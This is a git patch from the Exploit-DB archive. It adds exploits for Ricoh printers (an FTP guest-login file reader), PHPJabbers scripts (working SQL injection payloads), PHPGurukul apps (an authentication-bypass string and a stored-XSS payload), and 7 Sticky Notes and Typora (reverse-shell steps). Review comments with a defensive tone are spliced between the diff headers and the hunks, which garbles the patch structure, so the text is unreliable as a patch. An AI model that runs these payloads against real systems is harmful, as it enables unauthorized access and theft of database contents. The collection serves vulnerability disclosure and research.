From a5920da7aff185378118221654434790efbca949 Mon Sep 17 00:00:00 2001
From: Exploit-DB
Date: Tue, 30 Jan 2024 00:16:26 +0000
Subject: [PATCH] DB: 2024-01-30
10 changes to exploits/shellcodes/ghdb
Ricoh Printer - Directory and File Exposure
Blood Bank & Donor Management System using v2.2 - Stored XSS
Equipment Rental Script-1.0 - SQLi
Bank Locker Management System - SQL Injection
Fundraising Script 1.0 - SQLi
PHP Shopping Cart 4.2 - Multiple-SQLi
7 Sticky Notes v1.9 - OS Command Injection
Typora v1.7.4 - OS Command Injection
---
exploits/hardware/remote/51755.py | 52 +++++++++++++++++++++++++++++++
exploits/php/remote/51749.TXT | 32 +++++++++++++++++++
exploits/php/remote/51750.TXT | 17 ++++++++++
exploits/php/webapps/51751.TXT | 29 +++++++++++++++++
exploits/php/webapps/51753.TXT | 29 +++++++++++++++++
exploits/php/webapps/51754.TXT | 45 ++++++++++++++++++++++++++
exploits/windows/local/51748.TXT | 22 +++++++++++++
exploits/windows/local/51752.TXT | 18 +++++++++++
files_exploits.csv | 8 +++++
ghdb.xml | 18 +++++++++++
10 files changed, 270 insertions(+)
create mode 100755 exploits/hardware/remote/51755.py
create mode 100644 exploits/php/remote/51749.TXT
create mode 100644 exploits/php/remote/51750.TXT
create mode 100644 exploits/php/webapps/51751.TXT
create mode 100644 exploits/php/webapps/51753.TXT
create mode 100644 exploits/php/webapps/51754.TXT
create mode 100644 exploits/windows/local/51748.TXT
create mode 100644 exploits/windows/local/51752.TXT
diff --git a/exploits/hardware/remote/51755.py b/exploits/hardware/remote/51755.py
new file mode 100755
index 000000000..5007ca1f9
--- /dev/null
+++ b/exploits/hardware/remote/51755.py
@@ -0,0 +1,52 @@
+#Exploit Title: Ricoh Printer Directory and File Exposure
+#Date: 9/15/2023
+#Exploit Author: Thomas Heverin (Heverin Hacker)
+#Vendor Homepage: https://www.ricoh.com/products/printers-and-copiers
+#Software Link: https://replit.com/@HeverinHacker/Ricoh-Printer-Directory-and-File-Finder#main.py
+#Version: Ricoh Printers - All Versions
+#Tested on: Windows
+#CVE: N/A
+
+#Directories Found: Help, Info (Printer Information), Prnlog (Print Log), Stat (Statistics) and Syslog (System Log)
+
+from ftplib import FTP
+
+def ftp_connect(ip):
+ try:
+ ftp = FTP(ip)
+ ftp.login("guest", "guest")
+ print(f"Connected to {ip} over FTP as 'guest'")
+ return ftp
+ except Exception as e:
+ print(f"Failed to connect to {ip} over FTP: {e}")
+ return None
+
+if __name__ == "__main__":
+ target_ip = input("Enter the Ricoh Printer IP address: ")
+
+ ftp_connection = ftp_connect(target_ip)
+ if ftp_connection:
+ try:
+ while True:
+ file_list = ftp_connection.nlst()
+ print("List of Ricoh printer files and directories:")
+ for index, item in enumerate(file_list, start=1):
+ print(f"{index}. {item}")
+
+ file_index = int(input("Enter the printer index of the file to read (1-based), or enter 0 to exit: ")) - 1
+ if file_index < 0:
+ break
+
+ if 0 <= file_index < len(file_list):
+ selected_file = file_list[file_index]
+ lines = []
+ ftp_connection.retrlines("RETR " + selected_file, lines.append)
+ print(f"Contents of '{selected_file}':")
+ for line in lines:
+ print(line)
+ else:
+ print("Invalid file index.")
+ except Exception as e:
+ print(f"Failed to perform operation: {e}")
+ finally:
+ ftp_connection.quit()
\ No newline at end of file
diff --git a/exploits/php/remote/51749.TXT b/exploits/php/remote/51749.TXT
new file mode 100644
index 000000000..30587b531
--- /dev/null
+++ b/exploits/php/remote/51749.TXT
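Review bot: `ftp_connect` hard-codes `ftp.login("guest", "guest")`, yet the header never states that the exposure depends on the printer's FTP service accepting that account, and `#Version: Ricoh Printers - All Versions` reads as if device configuration did not matter. A header line such as `#Precondition: FTP service enabled and the guest/guest login accepted` would tell an administrator what to check, and what to disable or restrict, on their own devices. In the same function, when `login` raises, the function returns `None` without closing the connection that `FTP(ip)` opened; initialising `ftp = None` before the `try` and calling `ftp.close()` in the `except` branch when it is set avoids the leaked socket.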
@@ -0,0 +1,32 @@
+## Title: Equipment Rental Script-1.0 - SQLi
+## Author: nu11secur1ty
+## Date: 09/12/2023
+## Vendor: https://www.phpjabbers.com/
+## Software: https://www.phpjabbers.com/equipment-rental-script/#sectionDemo
+## Reference: https://portswigger.net/web-security/sql-injection
+
+## Description:
+The package_id parameter appears to be vulnerable to SQL injection
+attacks. The payload ' was submitted in the package_id parameter, and
+a database error message was returned. You should review the contents
+of the error message, and the application's handling of other input,
+to confirm whether a vulnerability is present. The attacker can steal
+all information from the database!
+
+[+]Payload:
+mysql
+
+Parameter: #1* ((custom) POST)
+ Type: error-based
+ Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
+ Payload: package_id=(-4488))) OR 1 GROUP BY
+CONCAT(0x71787a6a71,(SELECT (CASE WHEN (7794=7794) THEN 1 ELSE 0
+END)),0x7176717671,FLOOR(RAND(0)*2)) HAVING
+MIN(0)#from(select(sleep(20)))a)&cnt=2&date_from=12/9/2023&hour_from=11&minute_from=00&date_to=12/9/2023&hour_to=12&minute_to=00
+
+## Reproduce:
+https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Equipment-Rental-Script-1.0
+
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+home page: https://www.nu11secur1ty.com/
\ No newline at end of file
diff --git a/exploits/php/remote/51750.TXT b/exploits/php/remote/51750.TXT
new file mode 100644
index 000000000..689b5eb7a
--- /dev/null
+++ b/exploits/php/remote/51750.TXT
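Review bot: The path `exploits/php/remote/51749.TXT` files a web-application SQL injection under `remote`, while the other SQL injection write-ups added in this commit (`51751.TXT`, `51753.TXT`, `51754.TXT`) go to `exploits/php/webapps/`; the stored-XSS entry `51750.TXT` has the same placement. The matching `files_exploits.csv` rows carry `remote` as the type, so anyone filtering the index by `webapps` to find issues in PHP applications they run will miss these two. Moving both files to `exploits/php/webapps/` and setting the type column to `webapps` would keep the index consistent.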
@@ -0,0 +1,17 @@
+# Exploit Title: Blood Bank & Donor Management System using v2.2 - Stored XSS
+# Application: Blood Donor Management System
+# Version: v2.2
+# Bugs: Stored XSS
+# Technology: PHP
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/blood-bank-donor-management-system-free-download/
+# Date: 12.09.2023
+# Author: SoSPiro
+# Tested on: Windows
+
+#POC
+========================================
+1. Login to admin account
+2. Go to /admin/update-contactinfo.php
+3. Change "Adress" or " Email id " or " Contact Number" inputs and add "/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert('1') )//%0D%0A%0d%0a//\x3csVg/\x3e" payload.
+4. Go to http://bbdms.local/inedx.php page and XSS will be triggered.
\ No newline at end of file
diff --git a/exploits/php/webapps/51751.TXT b/exploits/php/webapps/51751.TXT
new file mode 100644
index 000000000..ebb82dca8
--- /dev/null
+++ b/exploits/php/webapps/51751.TXT
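Review bot: Step 4 points at `http://bbdms.local/inedx.php`, which looks like a typo for `index.php`, so the page where the stored value is rendered cannot be identified with confidence from the entry. The steps also never say that the contact fields saved in `/admin/update-contactinfo.php` are echoed without output encoding on the public page, which is the fact a maintainer needs in order to fix the template. Suggest correcting the file name once confirmed and adding one line such as `# Root cause: contact-info fields are rendered without HTML encoding`.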
@@ -0,0 +1,29 @@
+# Exploit Title: Bank Locker Management System - SQL Injection
+# Application: Bank Locker Management System
+# Date: 12.09.2023
+# Bugs: SQL Injection
+# Exploit Author: SoSPiro
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/
+# Tested on: Windows 10 64 bit Wampserver
+
+## Description:
+This report highlights a critical SQL Injection vulnerability discovered in the "Bank Locker Management System" application. The vulnerability allows an attacker to bypass authentication and gain unauthorized access to the application.
+
+## Vulnerability Details:
+- **Application Name**: Bank Locker Management System
+- **Software Link**: [Download Link](https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/)
+- **Vendor Homepage**: [Vendor Homepage](https://phpgurukul.com/)
+
+## Vulnerability Description:
+The SQL Injection vulnerability is present in the login mechanism of the application. By providing the following payload in the login and password fields:
+
+Payload: admin' or '1'='1-- -
+
+An attacker can gain unauthorized access to the application with administrative privileges.
+
+## Proof of Concept (PoC):
+1. Visit the application locally at http://blms.local (assuming it's hosted on localhost).
+2. Navigate to the "banker" directory: http://blms.local/banker/
+3. In the login and password fields, input the following payload:
+4. admin' or '1'='1-- -
\ No newline at end of file
diff --git a/exploits/php/webapps/51753.TXT b/exploits/php/webapps/51753.TXT
new file mode 100644
index 000000000..ff961ed18
--- /dev/null
+++ b/exploits/php/webapps/51753.TXT
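Review bot: The header carries no `# Version:` line and the title names no release, so the affected versions of Bank Locker Management System cannot be determined from this entry; `51750.TXT` in the same commit does include `# Version: v2.2`. Adding `# Version: <tested version>` (placeholder, to be filled in by the author) would let operators match it against what they run. The write-up also names only "the login mechanism" under `/banker/`; stating that the login query concatenates the submitted fields and should use a prepared statement would make the entry actionable for the vendor.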
@@ -0,0 +1,29 @@
+## Title: Fundraising Script-1.0 SQLi
+## Author: nu11secur1ty
+## Date: 09/13/2023
+## Vendor: https://www.phpjabbers.com/
+## Software: https://www.phpjabbers.com/fundraising-script/#sectionDemo
+## Reference: https://portswigger.net/web-security/sql-injection
+
+## Description:
+The `cid` parameter appears to be vulnerable to SQL injection attacks.
+The payload ' was submitted in the cid parameter, and a database error
+message was returned.
+The database is empty, but if it is not, this will be over for the
+money of the donors and their bank accounts!
+The attacker can steal all information from the database!
+
+[+]Payload:
+mysql
+
+Parameter: cid (GET)
+ Type: error-based
+ Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
+ Payload: controller=pjFront&action=pjActionLoadCampaign&cid=(UPDATEXML(1741,CONCAT(0x2e,0x71626b7071,(SELECT
+(ELT(1741=1741,1))),0x7162787171),3873))
+
+https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Fundraising-Script-1.0
+
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+nu11secur1ty
\ No newline at end of file
diff --git a/exploits/php/webapps/51754.TXT b/exploits/php/webapps/51754.TXT
new file mode 100644
index 000000000..5f6be6d57
--- /dev/null
+++ b/exploits/php/webapps/51754.TXT
@@ -0,0 +1,45 @@
+## Title: PHP Shopping Cart-4.2 Multiple-SQLi
+## Author: nu11secur1ty
+## Date: 09/13/2023
+## Vendor: https://www.phpjabbers.com/
+## Software:https://www.phpjabbers.com/php-shopping-cart-script/#sectionPricing
+## Reference: https://portswigger.net/web-security/sql-injection
+
+## Description:
+The `id` parameter appears to be vulnerable to SQL injection attacks.
+A single quote was submitted in the id parameter, and a database error
+message was returned. Two single quotes were then submitted and the
+error message disappeared. The attacker easily can steal all
+information from the database of this web application!
+WARNING! All of you: Be careful what you buy! This will be your responsibility!
+
+[+]Payload:
+mysql
+
+Parameter: id (GET)
+ Type: boolean-based blind
+ Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
+ Payload: controller=pjFront&action=pjActionGetStocks&id=1') OR NOT
+3795=3795-- sRcp&session_id=
+
+ Type: error-based
+ Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or
+GROUP BY clause (GTID_SUBSET)
+ Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND
+GTID_SUBSET(CONCAT(0x71717a6b71,(SELECT
+(ELT(3820=3820,1))),0x7178627871),3820)-- kQZA&session_id=
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND
+(SELECT 2625 FROM (SELECT(SLEEP(5)))nVyA)-- FGLs&session_id=
+
+## Reproduce:
+https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Shopping-Cart-4.2
+
+## Proof and Exploit:
+https://www.nu11secur1ty.com/2023/09/php-shopping-cart-42-multiple-sqli.html
+
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+nu11secur1ty
\ No newline at end of file
diff --git a/exploits/windows/local/51748.TXT b/exploits/windows/local/51748.TXT
new file mode 100644
index 000000000..917cf3df3
--- /dev/null
+++ b/exploits/windows/local/51748.TXT
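Review bot: The title says `Multiple-SQLi`, but the body documents a single injection point, `Parameter: id (GET)` on `pjActionGetStocks`, confirmed with three detection techniques (boolean-based, error-based, time-based). For triage that is one flaw in one query, so a title such as `PHP Shopping Cart 4.2 - 'id' SQL Injection` would describe it more accurately, and the `files_exploits.csv` description should match. The description also gives no remediation; a line noting that `id` should be bound as a typed query parameter would make the entry usable by the vendor.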
@@ -0,0 +1,22 @@
+# Exploit Title: 7 Sticky Notes v1.9 - OS Command Injection
+# Discovered by: Ahmet Ümit BAYRAM
+# Discovered Date: 12.09.2023
+# Vendor Homepage: http://www.7stickynotes.com
+# Software Link:
+http://www.7stickynotes.com/download/Setup7StickyNotesv19.exe
+# Tested Version: 1.9 (latest)
+# Tested on: Windows 2019 Server 64bit
+
+# # # Steps to Reproduce # # #
+
+# Open the program.
+# Click on "New Note".
+# Navigate to the "Alarms" tab.
+# Click on either of the two buttons.
+# From the "For" field, select "1" and "seconds" (to obtain the shell
+within 1 second).
+# From the "Action" dropdown, select "command".
+# In the activated box, enter the reverse shell command and click the "Set"
+button to set the alarm.
+# Finally, click on the checkmark to save the alarm.
+# Reverse shell obtained!
\ No newline at end of file
diff --git a/exploits/windows/local/51752.TXT b/exploits/windows/local/51752.TXT
new file mode 100644
index 000000000..8c7aa5909
--- /dev/null
+++ b/exploits/windows/local/51752.TXT
@@ -0,0 +1,18 @@
+# Exploit Title: Typora v1.7.4 - OS Command Injection
+# Discovered by: Ahmet Ümit BAYRAM
+# Discovered Date: 13.09.2023
+# Vendor Homepage: http://www.typora.io
+# Software Link: https://download.typora.io/windows/typora-setup-ia32.exe
+# Tested Version: v1.7.4 (latest)
+# Tested on: Windows 2019 Server 64bit
+
+# # # Steps to Reproduce # # #
+
+# Open the application
+# Click on Preferences from the File menu
+# Select PDF from the Export tab
+# Check the “run command” at the bottom right and enter your reverse shell
+command into the opened box
+# Close the page and go back to the File menu
+# Then select PDF from the Export tab and click Save
+# Reverse shell is ready!
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 6a1abca69..ac6dce0d0 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
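Review bot: As written, neither `51748.TXT` nor `51752.TXT` demonstrates an injection: in both, the logged-in user types a command into a field the application provides for running commands (the alarm action "command" in 7 Sticky Notes, the export "run command" box in Typora), so the steps show no untrusted input and no privilege boundary being crossed. If the intended risk is that this setting can reach another user through a shared or imported note or preferences file, the entry should state that delivery path, since that is what a defender would need to monitor or lock down. Otherwise the `OS Command Injection` label in the titles and in `files_exploits.csv` overstates the finding. Neither entry says under which account the configured command runs.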
@@ -3860,6 +3860,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 18291,exploits/hardware/remote/18291.txt,"Reaver - WiFi Protected Setup (WPS)",2011-12-30,cheffner,remote,hardware,,2011-12-30,2011-12-30,0,OSVDB-78282;CVE-2011-5053,,reaver-1.1.tar.gz,,, 34802,exploits/hardware/remote/34802.html,"Research In Motion BlackBerry Device Software 4.7.1 - Cross Domain Information Disclosure",2010-10-04,"599eme Man",remote,hardware,,2010-10-04,2014-09-28,1,,,,,,https://www.securityfocus.com/bid/43685/info 51642,exploits/hardware/remote/51642.py,"ReyeeOS 1.204.1614 - MITM Remote Code Execution (RCE)",2023-08-04,"Riyan Firmansyah of Seclab",remote,hardware,,2023-08-04,2023-08-04,0,,,,,, +51755,exploits/hardware/remote/51755.py,"Ricoh Printer - Directory and File Exposure",2024-01-29,"Thomas Heverin",remote,hardware,,2024-01-29,2024-01-29,0,,,,,, 9858,exploits/hardware/remote/9858.txt,"Riorey RIOS 4.7.0 - Hard-Coded Password",2009-10-08,"Marek Kroemeke",remote,hardware,8022,2009-10-07,2016-10-29,1,CVE-2009-3710;OSVDB-58858,,,,, 8269,exploits/hardware/remote/8269.txt,"Rittal CMC-TC Processing Unit II - Multiple Vulnerabilities",2009-03-23,"Louhi Networks",remote,hardware,,2009-03-22,,1,OSVDB-56342;OSVDB-56341;OSVDB-56340;OSVDB-56339,,2009-Louhi_CMC-brute_090323.zip,,,http://www.louhinetworks.fi/advisory/Louhi_CMC-brute_090323.zip 24892,exploits/hardware/remote/24892.txt,"Rosewill RSVA11001 - Remote Command Injection",2013-03-26,"Eric Urban",remote,hardware,,2013-03-26,2013-03-26,0,OSVDB-91630,,,,, 
@@ -12887,6 +12888,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 39514,exploits/php/remote/39514.rb,"ATutor 2.2.1 - SQL Injection / Remote Code Execution (Metasploit)",2016-03-01,Metasploit,remote,php,80,2016-03-01,2016-03-01,1,CVE-2016-2555,"Metasploit Framework (MSF)",,,http://www.exploit-db.comATutor-2.2.1.tar.gz, 47244,exploits/php/remote/47244.py,"AZORult Botnet - SQL Injection",2019-08-13,prsecurity,remote,php,,2019-08-13,2019-08-13,0,,Malware,,,, 47215,exploits/php/remote/47215.rb,"Baldr Botnet Panel - Arbitrary Code Execution (Metasploit)",2019-08-08,"Ege Balci",remote,php,80,2019-08-08,2019-08-08,0,,"Metasploit Framework (MSF)",,,, +51750,exploits/php/remote/51750.TXT,"Blood Bank & Donor Management System using v2.2 - Stored XSS",2024-01-29,SoSPiro,remote,php,,2024-01-29,2024-01-29,0,,,,,, 47699,exploits/php/remote/47699.rb,"Bludit - Directory Traversal Image File Upload (Metasploit)",2019-11-20,Metasploit,remote,php,,2019-11-20,2019-11-20,1,CVE-2019-16113,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/bludit_upload_images_exec.rb 45790,exploits/php/remote/45790.rb,"blueimp's jQuery 9.22.0 - (Arbitrary) File Upload (Metasploit)",2018-11-06,Metasploit,remote,php,,2018-11-06,2018-11-06,1,CVE-2018-9206,"Metasploit Framework (MSF)",,,http://www.exploit-db.comjQuery-File-Upload-9.22.0.tar.gz,https://raw.githubusercontent.com/rapid7/metasploit-framework/a32d8083f023c1445f411b74b8f85de5754cd3a0/modules/exploits/unix/webapp/jquery_file_upload.rb 45790,exploits/php/remote/45790.rb,"blueimp's jQuery 9.22.0 - (Arbitrary) File Upload (Metasploit)",2018-11-06,Metasploit,remote,php,,2018-11-06,2018-11-06,1,CVE-2018-9206,Remote,,,http://www.exploit-db.comjQuery-File-Upload-9.22.0.tar.gz,https://raw.githubusercontent.com/rapid7/metasploit-framework/a32d8083f023c1445f411b74b8f85de5754cd3a0/modules/exploits/unix/webapp/jquery_file_upload.rb 
@@ -12908,6 +12910,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 45227,exploits/php/remote/45227.php,"Easylogin Pro 1.3.0 - 'Encryptor.php' Unserialize Remote Code Execution",2018-08-20,mr_me,remote,php,,2018-08-20,2018-08-21,1,CVE-2018-15576,Remote,,,,https://srcincite.io/pocs/cve-2018-15576.php.txt 46539,exploits/php/remote/46539.rb,"elFinder PHP Connector < 2.1.48 - 'exiftran' Command Injection (Metasploit)",2019-03-13,Metasploit,remote,php,,2019-03-13,2019-03-28,1,CVE-2019-9194,"Metasploit Framework (MSF)",,,http://www.exploit-db.comelFinder-2.1.47.tar.gz,https://raw.githubusercontent.com/rapid7/metasploit-framework/a4c1181b9f81869b7b1df62affbc9554e828f81c/modules/exploits/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.rb 46539,exploits/php/remote/46539.rb,"elFinder PHP Connector < 2.1.48 - 'exiftran' Command Injection (Metasploit)",2019-03-13,Metasploit,remote,php,,2019-03-13,2019-03-28,1,CVE-2019-9194,"Command Injection",,,http://www.exploit-db.comelFinder-2.1.47.tar.gz,https://raw.githubusercontent.com/rapid7/metasploit-framework/a4c1181b9f81869b7b1df62affbc9554e828f81c/modules/exploits/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.rb +51749,exploits/php/remote/51749.TXT,"Equipment Rental Script-1.0 - SQLi",2024-01-29,nu11secur1ty,remote,php,,2024-01-29,2024-01-29,0,,,,,, 24018,exploits/php/remote/24018.rb,"eXtplorer 2.1 - Arbitrary File Upload (Metasploit)",2013-01-10,Metasploit,remote,php,,2013-01-10,2013-01-10,1,OSVDB-88751,"Metasploit Framework (MSF)",,,, 40434,exploits/php/remote/40434.rb,"FreePBX < 13.0.188 - Remote Command Execution (Metasploit)",2016-09-27,0x4148,remote,php,,2016-09-27,2016-09-27,0,,"Metasploit Framework (MSF)",,,, 46880,exploits/php/remote/46880.rb,"GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)",2019-05-20,Metasploit,remote,php,,2019-05-20,2019-05-20,1,CVE-2019-11231,"Metasploit Framework 
(MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb @@ -14528,6 +14531,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51378,exploits/php/webapps/51378.txt,"Bang Resto v1.0 - 'Multiple' SQL Injection",2023-04-20,"Rahad Chowdhury",webapps,php,,2023-04-20,2023-04-28,1,CVE-2023-29849,,,,, 51377,exploits/php/webapps/51377.txt,"Bang Resto v1.0 - Stored Cross-Site Scripting (XSS)",2023-04-20,"Rahad Chowdhury",webapps,php,,2023-04-20,2023-04-28,1,CVE-2023-29848,,,,, 51175,exploits/php/webapps/51175.txt,"Bangresto 1.0 - SQL Injection",2023-03-31,nu11secur1ty,webapps,php,,2023-03-31,2023-03-31,0,,,,,, +51751,exploits/php/webapps/51751.TXT,"Bank Locker Management System - SQL Injection",2024-01-29,SoSPiro,webapps,php,,2024-01-29,2024-01-29,0,,,,,, 41989,exploits/php/webapps/41989.txt,"BanManager WebUI 1.5.8 - PHP Code Injection",2017-05-10,HaHwul,webapps,php,,2017-05-10,2017-05-10,0,,,,,http://www.exploit-db.comBanManager-WebUI-1.5.8.zip, 17107,exploits/php/webapps/17107.txt,"Banner Ad Management Script - SQL Injection",2011-04-03,Egyptian.H4x0rz,webapps,php,,2011-04-03,2011-04-03,1,,,,,, 9387,exploits/php/webapps/9387.txt,"Banner Exchange Script 1.0 - 'targetid' Blind SQL Injection",2009-08-07,"599eme Man",webapps,php,,2009-08-06,,1,CVE-2009-5003;OSVDB-68191,,,,, 
@@ -18873,6 +18877,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 2621,exploits/php/webapps/2621.txt,"Fully Modded phpBB 2021.4.40 - Multiple File Inclusions",2006-10-23,020,webapps,php,,2006-10-22,2016-09-14,1,OSVDB-30035;CVE-2006-5526,,,,http://www.exploit-db.comFM2021-4-40.tar.gz, 29869,exploits/php/webapps/29869.php,"Fully Modded PHPBB2 - 'phpbb_root_path' Remote File Inclusion",2007-04-19,"HACKERS PAL",webapps,php,,2007-04-19,2013-11-28,1,CVE-2007-2257;OSVDB-35419,,,,,https://www.securityfocus.com/bid/23565/info 3998,exploits/php/webapps/3998.php,"Fundanemt 2.2.0 - 'spellcheck.php' Remote Code Execution",2007-05-27,Kacper,webapps,php,,2007-05-26,,1,OSVDB-36657;CVE-2007-2935,,,,, +51753,exploits/php/webapps/51753.TXT,"Fundraising Script 1.0 - SQLi",2024-01-29,nu11secur1ty,webapps,php,,2024-01-29,2024-01-29,0,,,,,, 37500,exploits/php/webapps/37500.txt,"Funeral Script PHP - Cross-Site Scripting / SQL Injection",2012-06-17,snup,webapps,php,,2012-06-17,2015-07-06,1,,,,,,https://www.securityfocus.com/bid/54402/info 27275,exploits/php/webapps/27275.txt,"FunGamez - Arbitrary File Upload",2013-08-02,cr4wl3r,webapps,php,,2013-08-02,2013-08-02,0,OSVDB-95946,,,,http://www.exploit-db.comfg_download.zip, 8493,exploits/php/webapps/8493.txt,"fungamez rc1 - Authentication Bypass / Local File Inclusion",2009-04-20,YEnH4ckEr,webapps,php,,2009-04-19,,1,OSVDB-54165;CVE-2009-1489;OSVDB-54164;CVE-2009-1488;OSVDB-54163;CVE-2009-1487,,,,, 
@@ -26175,6 +26180,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 38572,exploits/php/webapps/38572.txt,"PHP Server Monitor 3.1.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-10-30,hyp3rlinx,webapps,php,,2015-10-30,2015-10-30,0,,,,,http://www.exploit-db.comphpservermon-3.1.1.zip,http://hyp3rlinx.altervista.org/advisories/AS-PHPSRVMONITOR-CSRF.txt 45932,exploits/php/webapps/45932.txt,"PHP Server Monitor 3.3.1 - Cross-Site Request Forgery",2018-12-03,"Javier Olmedo",webapps,php,80,2018-12-03,2018-12-03,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comphpservermon-3.3.1.tar.gz, 12861,exploits/php/webapps/12861.txt,"PHP SETI@home Web monitor - 'PHPsetimon' Local/Remote File Inclusion",2010-06-03,eidelweiss,webapps,php,,2010-06-02,,0,,,,,, +51754,exploits/php/webapps/51754.TXT,"PHP Shopping Cart 4.2 - Multiple-SQLi",2024-01-29,nu11secur1ty,webapps,php,,2024-01-29,2024-01-29,0,,,,,, 2119,exploits/php/webapps/2119.txt,"PHP Simple Shop 2.0 - 'abs_path' Remote File Inclusion",2006-08-07,Matdhule,webapps,php,,2006-08-06,,1,OSVDB-27805;CVE-2006-4052;OSVDB-27804;OSVDB-27803;OSVDB-27802;OSVDB-27801;OSVDB-27800,,,,,http://advisories.echo.or.id/adv/adv44-matdhule-2006.txt 5842,exploits/php/webapps/5842.txt,"PHP Site Lock 2.0 - 'index.php' SQL Injection",2008-06-17,Mr.SQL,webapps,php,,2008-06-16,,1,OSVDB-46792;CVE-2008-2865,,,,, 8604,exploits/php/webapps/8604.txt,"PHP Site Lock 2.0 - Insecure Cookie Handling",2009-05-04,"ThE g0bL!N",webapps,php,,2009-05-03,,1,OSVDB-54203;CVE-2009-1587,,,,, 
@@ -39256,6 +39262,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50494,exploits/windows/local/50494.txt,"10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path",2021-11-05,"Brian Rodriguez",local,windows,,2021-11-05,2021-11-05,0,,,,,, 50472,exploits/windows/local/50472.py,"10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH)",2021-11-02,ro0k,local,windows,,2021-11-02,2021-11-02,0,,,,,, 48277,exploits/windows/local/48277.py,"10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)",2020-04-01,Hodorsec,local,windows,,2020-04-01,2020-04-01,0,,,,,, +51748,exploits/windows/local/51748.TXT,"7 Sticky Notes v1.9 - OS Command Injection",2024-01-29,"Ahmet Ümit BAYRAM",local,windows,,2024-01-29,2024-01-29,0,,,,,, 17647,exploits/windows/local/17647.rb,"A-PDF All to MP3 2.3.0 - Universal DEP Bypass",2011-08-10,"C4SS!0 G0M3S",local,windows,,2011-08-10,2012-11-15,1,,,,http://www.exploit-db.com/screenshots/idlt18000/screen-shot-2012-11-15-at-74224-am.png,http://www.exploit-db.coma-pdf-atmc.exe, 15033,exploits/windows/local/15033.py,"A-PDF All to MP3 Converter 1.1.0 - Universal Local (SEH)",2010-09-17,modpr0be,local,windows,,2010-09-17,2010-09-17,1,OSVDB-68132,,,http://www.exploit-db.com/screenshots/idlt15500/15033.png,http://www.exploit-db.coma-pdf-atmc.exe, 16009,exploits/windows/local/16009.pl,"A-PDF All to MP3 Converter 2.0.0 - '.wav' Local Buffer Overflow",2011-01-18,h1ch4m,local,windows,,2011-01-18,2011-01-18,1,,,,http://www.exploit-db.com/screenshots/idlt16500/screen-shot-2011-01-18-at-82452-am.png,http://www.exploit-db.coma-pdf-atmc.exe, 
@@ -41613,6 +41620,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 17967,exploits/windows/local/17967.rb,"TugZip 3.5 Archiver - '.ZIP' File Parsing Buffer Overflow (Metasploit)",2011-10-11,Metasploit,local,windows,,2011-10-11,2016-10-27,1,CVE-2008-4779;OSVDB-49371,"Metasploit Framework (MSF)",,http://www.exploit-db.com/screenshots/idlt18000/17967.png,, 47012,exploits/windows/local/47012.py,"Tuneclone 2.20 - Local SEH Buffer Overflow",2019-06-20,Achilles,local,windows,,2019-06-20,2019-06-20,0,,,,,http://www.exploit-db.comtuneclone_setup.exe, 12293,exploits/windows/local/12293.py,"TweakFS 1.0 FSX Edition - Stack Buffer Overflow",2010-04-19,corelanc0d3r,local,windows,,2010-04-18,2011-01-03,1,OSVDB-63899;CVE-2010-1458,,,http://www.exploit-db.com/screenshots/idlt12500/screen-shot-2011-01-03-at-84220-pm.png,http://www.exploit-db.comtweakfs_zip_fsx.zip,http://www.corelan.be:8800/advisories.php?id=CORELAN-10-026 +51752,exploits/windows/local/51752.TXT,"Typora v1.7.4 - OS Command Injection",2024-01-29,"Ahmet Ümit BAYRAM",local,windows,,2024-01-29,2024-01-29,0,,,,,, 43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows,,2017-12-26,2017-12-26,0,CVE-2016-6914,,,,, 33961,exploits/windows/local/33961.txt,"Ubisoft Uplay 4.6 - Insecure File Permissions Privilege Escalation",2014-07-03,LiquidWorm,local,windows,,2014-07-04,2014-07-09,1,OSVDB-108726;CVE-2014-5453,,,http://www.exploit-db.com/screenshots/idlt34000/screen-shot-2014-07-09-at-91305-am.png,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5191.php 36189,exploits/windows/local/36189.txt,"Ubisoft Uplay 5.0 - Insecure File Permissions Privilege 